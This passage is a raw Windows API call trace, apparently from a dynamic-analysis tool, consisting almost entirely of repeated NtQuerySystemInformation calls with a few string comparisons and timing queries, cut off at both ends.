(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0286.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0286.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x38, ResultLength=0x0) [0286.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0286.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0286.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0286.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0286.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x38, ResultLength=0x0) [0286.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0286.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0286.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0286.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0d8, Length=0x50, ResultLength=0x0) [0286.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d050, Length=0x28, ResultLength=0x0) [0286.865] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0286.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0d8, Length=0x50, ResultLength=0x0) [0286.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0d8, Length=0x50, ResultLength=0x0) [0286.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0286.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0286.865] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0286.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0286.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0286.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x50, ResultLength=0x0) [0286.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x38, ResultLength=0x0) [0286.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0286.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0286.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0286.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x28, ResultLength=0x0) [0286.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x38, ResultLength=0x0) [0286.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce10, Length=0x28, ResultLength=0x0) [0286.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce10, Length=0x28, ResultLength=0x0) [0286.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x38, ResultLength=0x0) [0286.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x20, ResultLength=0x0) [0286.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x20, ResultLength=0x0) [0286.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x20, ResultLength=0x0) [0286.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x20, ResultLength=0x0) [0286.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x38, ResultLength=0x0) [0286.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x20, ResultLength=0x0) [0286.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0286.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0286.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa78207d020 | out: lpSystemTimeAsFileTime=0xa78207d020*(dwLowDateTime=0x3857c493, dwHighDateTime=0x1d6666a)) [0286.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0d8, Length=0x50, ResultLength=0x0) [0286.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d010, Length=0x28, ResultLength=0x0) [0286.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf28, Length=0x50, ResultLength=0x0) [0286.891] GetTickCount () returned 0x1187c33 [0286.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf8, Length=0x58, ResultLength=0x0) [0286.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0286.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0286.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0286.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0286.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0286.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x28, ResultLength=0x0) [0286.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0286.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0286.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0286.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0286.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x20, ResultLength=0x0) [0286.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0286.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0286.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0286.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0286.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x20, ResultLength=0x0) [0286.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0286.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0286.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf8, Length=0x58, ResultLength=0x0) [0286.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0286.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0286.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0286.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0286.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0286.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb80, Length=0x28, ResultLength=0x0) [0286.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0286.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0286.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0286.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0286.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0286.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0286.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0286.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0286.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0286.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0286.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0286.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0286.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0286.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0286.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0286.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0286.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0286.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0286.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0286.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0286.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0286.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.920] NtQuerySystemInformation 